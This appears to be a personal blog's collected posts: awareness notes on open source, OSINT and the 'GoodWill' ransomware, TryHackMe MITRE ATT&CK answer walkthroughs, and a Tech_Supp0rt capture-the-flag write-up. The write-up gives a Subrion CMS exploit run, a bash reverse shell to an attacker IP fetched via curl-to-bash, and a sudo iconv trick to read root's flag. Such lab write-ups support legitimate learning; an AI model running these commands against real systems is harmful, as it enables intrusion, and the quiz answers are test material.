Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.

 

This week we take about open source.

    We hear open source all over the place, but do you know what it is?  Open source refers to software that can be modified and shared because its design is publicly accessible.  The simplified version is the source code (the part that makes up the software) can be accessed easily and minimal to no cost, then you can add, remove, or replace any of that code to make it your own.  So if you hear that some software is open source, then it was created by means to be distributed and used free of cost.  They some times will have a donation page asking for donations to help cover the cost of running, maintaining, and updating the software. 

    Is all open source software safe to use?  The short answer is no, but the long answer is nnnnnooooooooooooo.  Basically it is a two-edged sword, on the one side you (or a programmer) have the ability to check the source code for anything malicious, on the other side someone malicious could have put something in that source code you don't know about.  That is one reason why you should only download software directly from the company that created the software.  When you download from third party sites, you run the risk of downloading a tainted file. 

    So what are the advantages and disadvantages of using open source software?  Let us start with the advantages, firstly it is created by people that are very talented and enjoy what they do.  If these people didn't like what they do, then they would not have created it.  Secondly, it tends to be cheaper than commercial versions.  They are either free, ask for a lower cost, or ask for a donation to the project.  Thirdly, the software is reliable, which goes hand in hand with the created by talented people.  Lastly it is flexible, since you are not tied to a proprietary software architecture, it can be used or configured for many platforms.

    Now let us look at the disadvantages, firstly it is more easily editable and could have malicious code hidden in it.  This would go with download it from a reputable site.  Secondly, it might not be as user-friendly as it is a proprietary counterpart.  Thirdly, when it comes to support it is more community based.  You might  not be able to go to the creators website and get a solution to your problems, you'll probably have to check out forums and different post from people that had the same issue as you and how they fixed it.  Sometimes you'll find a solution, sometimes you won't. 

    We all use open source software daily, Thunderbird our email client is open source.  Sometimes you just need to do a little research to vet if the software is good and legitimate.  As always if you have any questions feel free to email me, and if you have any topic you'd like me to talk about.  Have a great week.

If you'd like to read more about open source, this is where I got some of my information
https://connectusfund.org/7-main-advantages-and-disadvantages-of-open-source-software

https://opensource.com/resources/what-open-source

TryHackMe write-up | MITRE Task 3 ATT&CK® Framework

 

What is the ATT&CK® framework? According to the website, MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. In 2013, MITRE began to address the need to record and document common TTPs (Tactics, Techniques, and Procedures) that APT (Advanced Persistent Threat) groups used against enterprise Windows networks. This started with an internal project known as FMX (Fort Meade Experiment). Within this project, selected security professionals were tasked to emulated adversarial TTPs against a network, and data was collected from the attacks on this network. The gathered data helped construct the beginning pieces of what we know today as the ATT&CK® framework.

The ATT&CK® framework has grown and expanded throughout the years. One notable expansion was that the framework focused solely on the Windows platform but has expanded to cover other platforms, such as macOS and Linux. The framework is heavily contributed to by many sources, such as security researchers and threat intelligence reports. Note this is not only a tool for blue teamers. The tool is also useful for a penetration tester and/or red teamer.

If you havent done so, navigate to the ATT&CK® website. Direct your attention to the bottom of the page to view the ATT&CK® Matrix for Enterprise. Across the top of the matrix, there are 14 categories. Each category contains the techniques an adversary could use to perform the tactic. The categories cover the seven-stage Cyber Attack Lifecycle (credit Lockheed Martin for the Cyber Kill Chain).

Under Initial Access, there are 9 techniques. Some of the techniques have sub-techniques, such as Phishing.

If we click on the gray bar to the right, a new layer appears listing the sub-techniques.

To get a better understanding of this technique and its associated sub-techniques, click on Phishing.

We have been directed to a page dedicated to the technique known as Phishing and all related information regarding the technique, such as a brief description, Procedure Examples, and Mitigations.

You can alternatively resort to using the Search feature to retrieve all associated information regarding a given technique, sub-technique, and/or group.

Lastly, the same data can be viewed via the MITRE ATT&CK® Navigator: The ATT&CK® Navigator is designed to provide basic navigation and annotation of ATT&CK® matrices, something that people are already doing today in tools like Excel. Weve designed it to be simple and generic - you can use the Navigator to visualize your defensive coverage, your red/blue team planning, the frequency of detected techniques, or anything else you want to do.

You can access the Navigator view when visiting a group or tool page. The ATT&CK® Navigator Layers button will be available.

In the sub-menu select view.

Lets get acquainted with this tool. Click here to view the ATT&CK® Navigator for Carbanak.

At the top left, there are 3 sets of controls: selection controls, layer controls, and technique controls. I encourage you to inspect each of the options under each control to get familiar with them. The question mark at the far right will provide additional information regarding the navigator.

To summarize, we can use the ATT&CK Matrix to map a threat group to their tactics and techniques.  There are various methods the search can be initiated.

The questions below will help you become more familiar with the ATT&CK®. It is recommended to start answering the questions from the Phishing page. Note, that this link is for version 8 of the ATT&CK Matrix.

Answer the questions below

Only blue teamers will use the ATT&CK Matrix? (Yay/Nay)?

How to: You can find this answer in the second paragraph above. 

Answer: Nay

What is the ID for this technique? 

How to: The last paragraph recommands you to start at the Phishing page, this is the technique it is talking about. Once you are on the page, on the right hand side you will see a box with information in it, inside of the box is the ID and the answer to this question. 

Answer: T1566 

Hint: https://attack.mitre.org/versions/v8/techniques/T1566/

Based on this technique, what mitigation covers identifying social engineering techniques? 

How to: Staying on the Phishing page, scroll down till you see the table labeled Mitigation. Then read through till you find which mitigation covers social engineering techniques. This is the answers. 

Answer: User Training

There are other possible areas for detection for this technique, which occurs after what other technique? How to: It took me a while to figure this out and find it, the question is worded very odd. But the hint is a URL so if you go to that site then the answer can be found in the final paragraph of Detection. 

Answer: User Execution 

Hint: https://attack.mitre.org/versions/v8/techniques/T1566/

What group has used spear phishing in their campaigns? 

How to: Stay on the page that TryHackMe gave you in the previous question as a hint (https://attack.mitre.org/versions/v8/techniques/T1566/). Scroll to Procedure Example, the answer is one of the names in Procedure Example. 

Answer: Dragonfly

Based on the information for this group, what are their associated groups? 

How to: This question is based off of the answer of the previous question. Click on the group to go to it's MITRE page, once there on the right side of the screen will be a box. Inside the box is the Associated Groups, copy them and paste in the answer. 

Answer: TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear

What tool is attributed to this group to transfer tools or files from one host to another within a compromised environment? 

How to: Scroll down till you see the Software catergory, look through and read the descriptions till you find which one can transfer tools and files. This will be your answer. 

Answer: PsExec

Based on the information about this tool, what group used a customized version of it? 

How to: Click on the tool that was the answer for the previous question. This will take you to that tool's page, scroll down till you see Groups That Use This Software. Look through the groups and their descriptions to see who uses the customized version of the tool. 

Answer: FIN5

This group has been active since what year? 

How to: Click on the Group that was the answer for the previous question. You will be brought to the Groups page, in the desription paragraph at the top of the page will have the answer to this question. 

Answer: 2008

Instead of Mimikatz, what OS Credential Dumping tool does this group use? 

How to: Staying on this page scroll down till you see the Software category, look through the different software this group uses till you find the one that does OS Credential Dumping tool that is not Mimikatz. This is your answer. 

Answer: Windows Credential Editor

TryHackMe write-up | MITRE Task 2 Basic Terminology

Before diving in, lets briefly discuss a few terms that you will often hear when dealing with the framework, threat intelligence, etc. APT is an acronym for Advanced Persistent Threat. This can be considered a team/group (threat group), or even country (nation-state group), that engages in long-term attacks against organizations and/or countries. The term advanced can be misleading as it will tend to cause us to believe that each APT group all have some super-weapon, e.i. a zero-day exploit, that they use. That is not the case. As we will see a bit later, the techniques these APT groups use are quite common and can be detected with the right implementations in place. You can view FireEyes current list of APT groups here.

TTP is an acronym for Tactics, Techniques, and Procedures, but what does each of these terms mean? The Tactic is the adversarys goal or objective. The Technique is how the adversary achieves the goal or objective. The Procedure is how the technique is executed.

If that is not that clear now, dont worry. Hopefully, as you progress through each section, TTPs will make more sense.

Answer the questions below

Read the above

How to: No Answer Needed. 

Answer: No Answer Needed.

TryHackMe write-up | MITRE Task 1 Introduction to MITRE

For those that are new to the cybersecurity field, you probably never heard of MITRE. Those of us that have been around might only associate MITRE with CVEs (Common Vulnerabilities and Exposures) list, which is one resource youll probably check when searching for an exploit for a given vulnerability. But MITRE researches in many areas, outside of cybersecurity, for the safety, stability, and well-being of our nation.  These areas include artificial intelligence, health informatics, space security, to name a few.

From Mitre.org: At MITRE, we solve problems for a safer world. Through our federally funded R&D centers and public-private partnerships, we work across government to tackle challenges to the safety, stability, and well-being of our nation.

In this room, we will focus on other projects/research that the US-based non-profit MITRE Corporation has created for the cybersecurity community, specifically:

ATT&CK® (Adversarial Tactics, Techniques, and Common Knowledge) Framework

CAR (Cyber Analytics Repository) Knowledge Base

SHIELD (sorry, not a fancy acronym) Active Defense

AEP (ATT&CK Emulation Plans)

Lets dive in, shall we...

Answer the questions below

Read the above

How to: No Answer Needed. 

Answer: No Answer Needed.

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.

 Today we will talk about OSINT.

 

            What is OSINT and how do you pronounce that?  Let’s start with the latter and work our way from there.  It is pronounced O SIN T, start with the O and say SIN, and end it with a T.  So what is OSINT, it stands for Open Source Intelligence, the meaning which is coming from Wikipedia is, “the collection and analysis of data gathered from open sources (overt and publicly available sources) to produce actionable intelligence.”  Basically, it means any source of information you can gather by publicly available means.  It’s the beginning steps that some hackers would take to investigate you and find out all they can so that hack or take advantage of you. 

 

            Are hackers the only ones that do this? Nope, it is not just hackers that use OSINT, it is business’s, law enforcement, or nation-state actors.  Businesses use OSINT to gather knowledge about consumers as to better market to them and thus increase profits.  Law enforcement use it to gather knowledge people they are trying to arrest, to build a better case on them.  Nation-state actors use this info to do all sorts of malicious things spear phishing (target phishing campaign) to industrial sabotage.  Nation-state actors can be some of the most highly trained and devoted hackers out there. 

 

            Your are probably asking yourself, how does this pertain to me?  OSINT can be used to learn more about you!  This is one reason I say to keep all your account private as much as possible and don’t overshare on social media.  But how do they find all this out?  Nowadays they have software out there that can do sweeps of the internet for certain usernames, email addresses, etc.  But the most common thing used today is called Google hacking or more commonly known as Google Dorking.  Techopedia defines Google Dorking as “a hacking technique that makes use of Google's advanced search services to locate valuable data or hard-to-find content.”  So you use advanced search services that are already baked into Google’s search engine,  In the next paragraph we will look into how this is done and ways you can use it to your benefit.

 

            So let say you wanted to search a website (lets say Target) for an item or items(lets say Pokemon), you could type in the Google search bar pokemon target and you’ll get things from Pokemon cards to toys to youtubers that went to target for Pokemon.  Now if we put in the Google search bar site:target.com “Pokemon”, this will search the Target website for anything that has the word Pokemon in it.  You can do this with any website and and search terms, I used this process when looking for ink for printers here at SMC.  There are tons that you can do with Google Dorking, I’ve linked a google dork cheat sheet in the sources if you care to look.

 

            Other the Google Dorking what are some other ways that people find OSINT.  Well once someone gets your name or even a username that you use on social media, video games, etc. they can start to build their OSINT on you by searching either of those terms and as they find more info it will give them more to search.  It’s like a snowball effect or an even more strange analogy where the person takes a penny and trades up to eventually have a car.  It is reasons like these I advocate that you use a Password Manager, 2FA, change accounts to private, and never trust anyone online or on the phone.  If you just do a couple of these then you will be ahead of so many people.

 

            I hope this has been eye-opening and gives you a better understanding of what OSINT is and how it can be used to help or harm you.  As always if you have a questions or concerns feel free to call or email me, I’d love to talk about it.  Also if you have any DR note topics you want me to discuss please let me know.  Until next week, I hope you have a great week and Be Awesome.

 

Source:

Open-source intelligence: https://en.wikipedia.org/wiki/Open-source_intelligence

Nation State Threat Actors: From a Security Awareness Perspective: https://www.sans.org/blog/nation-state-threat-actors-from-a-security-awareness-perspective/

What is Spear Phishing: https://www.knowbe4.com/spear-phishing/

Google Dorking: https://www.techopedia.com/definition/30938/google-dorking

Google Dork Cheatsheet: https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06

OSINT Framework: https://osintframework.com

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.

 Today we will talk about the "GoodWill" ransomware

 

Have you heard of this ransomware?  It is called "GoodWill" and it seems to aim at making you a better person.  You may be asking yourself how does it do this?  Well, I shall discuss with you how it is done.  First, your computer will need to be infected with this ransomware, this can be done like any other virus you get on your PC.  You clicked on a link you shouldn’t have, downloaded a pirated movie or game, went to that porn site, etc.  But now your computer is infected and there is only one way to get it decrypted.

 

Technically there are several "Activities" in this one way but we shall look at them one at a time.  The first "Activity" they require you to do is to cloth a roadside homeless person.  But you not only have to give them clothing, but you must also create a Facebook, Instagram, or Whatsapp story about clothing the homeless.  You must also use the photo frame they give you and encourage others to do it as well.  Once you do this then you have to send them an email with a screenshot of the post and the post link, here is my favorite part, it says and I quote "later our team will verify the whole case and promotes you for the next activity".  So then you have to wait till their team verifies what you have done, then you can move on to the next "Activity".  Let's look at the next "Activity" to see what our "GoodWill" entail.

 

The next "Activity" is to pick up 5 poor children from your neighborhood and take them out for dinner at Dominos, Pizza Hut, or KFC.  Then once again you will have to make a story post on your social media, this time though the kids have to be in the picture and have smiles on their faces.  You must again use their picture frame and take screenshots of the post, this time though you will need to take a picture of your receipt to send along with to the ransomware people.  Also again you will have to wait to have it verified before you can move on to the third and final "Activity".

 

The final "Activity", now requires you to go to your nearest hospital, and find someone that needs their care paid for because they don't have the money and pay their medical bill.  That's correct, you must go pay their medical bill, or as the ransomware states "provide them maximum part of the required amount."  You will also need to get selfies with the person you just paid their medical bill, record the whole conversation between you and them and send it back to the ransomware people.  But you’re not done yet, after you have done everything above you then need to and I quote, "Write a beautiful article on your Facebook and Instagram by sharing your wonderful experience to other people that how you transform yourself into a kind human being by becoming victim of a ransomware called Good Will".  So you not only have to do all these "goodwill" acts but at the end, you have to create a post saying that this ransomware has changed your life for the better.  Then hopefully this ransomware group with send you a decryption key that you can decrypt your files.

 

Well, I don't know about you but I don't need ransomware forcing me into performing "activities" and making me post about it on social media to create awareness about the plight of being a human.  Are these things happening, yes. Do you wish more people would help with these issues, yep.  Should you hi-jack someone’s files and force them into this position in the hope it will make them a better person in the end, nope.  Ransomware in any form no matter have "pure" your intentions are, is illegal.  The easiest way to fight against ransomware is to keep your computer up-to-date with the latest security updates and to have a good anti-virus in place.

 

I hope this has informed you about some of the newest ransomware that could not only impact your work system but even your computer at home.  If you have any questions feel free to leave a comment below.  If you have any ideas for future DR notes please let me know, and maybe it will be a future DR note.  I hope you are having a great week and Be Awesome!

 

 

 

 

Sources:

 

New 'GoodWill' Ransomware Forces Victims to Donate Money and Clothes to the Poor: https://thehackernews.com/2022/05/new-goodwill-ransomware-forces-victims.html

 

Eerie GoodWill ransomware forces victims to publish videos of good deeds on social media: https://blog.malwarebytes.com/ransomware/2022/05/eerie-goodwill-ransomware-forces-victims-to-publish-videos-of-good-deeds-on-social-media/#:~:text=GoodWill%20ransomware%20functions%20like%20any,to%20recover%20your%20locked%20files.

TryHackMe Tech_Supp0rt: 1 Write up

 Hack into the machine and investigate the target.

 

Please allow about 5 minutes for the machine to fully boot!

 

Note: The theme and security warnings encountered in this room are part of the challenge.

 

To start off I want to give a huge shout out to my source here. when ever I was stuck I would refer back to this walk through so please show him love and check it out!!!!!!!

 

Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890

 

 

How to: So to start off make sure you have the machine booted up, and once it is boot copy the IP address of the target machine.  Make sure if you are not using the attackbox machine that you have your VM connected to the TryHackMe openvpn.  You can do this by first being in the same folder that you have the openvpn file, run the command sudo openvpn [name of the file.ovpn].  This will get you connect and be able to work with the target machine.

 

Now that you are connect to the TryHackMe VPN and have the IP address of the target machine time to do some recon, lets start off by doing an nmap scan.  The nmap scan I ran was nmap -A [ip of target machine],  the -A will enable OS detection, version detection, script scanning, and traceroute.  Here is the results of our nmap scan:

 

 

We can see that ports 22, 80, 139, and 445 are open.  The next scan to run would be smbmap, run it with smbmap -H [IP of target machine] -P 139, the -H is to set the host and the -P sets the port.  Here is the results of the smbmap scan:

 

So as you can see the websvr is read only, so we might be able to take a peak inside.  Let us try using smbclient //[IP of target machine]/websvr.  When prompted for a password leave it blank and hit enter.  Now we are in the smbserver, you can list it's contents with the command ls , and we see an interesting file called enter.txt. We can download the file by using the command get enter.txt.  This will copy it over to your current directory.  You can now type exit in the smbserver to leave.  Now use the command cat enter.txt to view the text file.

 

 

This gives us some good info and a hint.  For the Subrion creds it says cooked with a magical formula, that’s the hint, if you go to https://gchq.github.io/CyberChef/ copy the Subrion creds and paste it into Cyber Chef by the output you will see a magic want.  Click on the magic wand and it will give you the Subrion password which is:

 

So now we can hold that credential in our back pocket for now.  Next we can run another scan to check on any sub domains, we can do this by running Gobuster.  If you don't have Gobuster on your machine you can get it here (https://github.com/OJ/gobuster), once you get it then you can run it with this command, gobuster dir -u [IP of target machine]  -w /usr/share/dirb/wordlists/common.txt -t 4 ,  the dir is for directory mode, -u is to set the url, -w sets the wordlist, and -t sets how many threads you will use.  Here is the results of the Gobuster scan:

 

 

Now we have some of the server directories, we have a password lets see where we can get too.  If you look at the enter.txt file that we got from the smb server it says fix the subrion site, and edit from panel we can try this by opening up firefox and typing in [IP of Target Machine]/subrion/panel/ and it should take you to a login panel that we can put in the creds we got from the enter.txt.  Here is a picture of the login panel site:

 

 

Now that we are inside if you look at the bottom left you will see the version of Subrion CMS that we are running.  The version is Subrion CMS v 4.2.1, we can search it to see if there are any exploits we can use.  We can start with searchsploit.  I ran the command searchsploit subrion cms 4.2.1, and got back 4 results.

 

I went with the second one, and to find the full path I ran this command searchsploit php/webapps/49876.py -p, and got back the path: /usr/share/exploitdb/exploits/php/webapps/49876.py.  I can now cp it over to my current directory by using the command sudo cp /usr/share/exploitdb/exploits/php/webapps/49876.py /home/[username], we use sudo since it is in an root area that requires root privileges' to copy.  Now that we have the file copied over to our current directory we can run it on the server using the following command, python3 49876.py -u http://[IP of Target Machine]/subrion/panel/ -l admin -p Hidden, the -u is to set the url, the -l is to set the user and -p sets the password.  Once this is run you should have a webshell on the subrion server:

 

So my next move was to try and upload linpeas to the server to see what weaknesses it had, I started a python simple HTTP and tried to curl over linpeas but it kept giving me errors so my next move was to go into the web panel and upload it that way.  Once you have logged in you can then click on content and then on upload.  You will see a floppy disk icon in uploads that you can use to upload a file.  This is how I uploaded linpeas.

 

 

Once it is in there then run the command chmod 777 linpeas.sh, this will make linpeas executable on the system .  Then use the command ./linpeas.sh, now you won't see anything going on and maybe think that it froze but it will take a minute it is running.  When it is finished you will have a wealth of knowledge about the server, one thing that was found looks like the password to the word press site:

 

 

Also in the linpeas scan you find some programs you can run on this system and two users:

 

 

 

So then I created a simple reverse shell script using nano shell.sh, and putting in it bash -i >& /dev/tcp/[IP of Attack Machine]/4444 0>&1. Make sure you have nc listening and the python simple HTTP server sending, first the nc, on your attack machine for the call too, I did this with the command  nc -lnvp 4444

 

 

Then the python simple HTTP server can be ran with this command  python -m SimpleHTTPServer, the -m run library module as a script:

 

 

From there on the target machine run the command curl [IP of Attack Machine]:8000/shell.sh | bash , this will get the script and run it on the target machine calling back to the nc listening port we started on our attack machine:

 

 

Now that we have a reverse shell I made my way to the tmp folder using cd /tmp, then I checked to see if python was on this machine with the command which python:

 

 

Now its time to upgrade our shell so we can run commands like sudo and su. To do this you will need to run this python command python -c 'import pty;pty.spawn("/bin/bash")' , this will allow you to run more commands on the system.  Now we can use  su scamsite to see if we can move over to that terminal.  Once we do su scamsite it will prompt for a password so we can try the ones we know already: these are hidden and you must do the room to find them. The second password worked and we are now scamsite!

I ran the sudo -l  command to see what can be run through scam site:

 

 

Then once I saw that iconv could be run I went to GTFObins to see how I could use it:

 

 

So after trying a failing at it a could times I tried sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt" , and it worked!!!! I got the flag copied it over and pasted it in TryHackMe.

 

 

Again huge shout out to my source here when ever I was stuck I would refer back to this walk through so please show him love and check it out!!!!!!!

 

Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890

 

Answer the questions below

 

What is the root.txt flag?

 

Answer: You wont get it that easlily!!!

 

 

From <https://tryhackme.com/room/techsupp0rt1>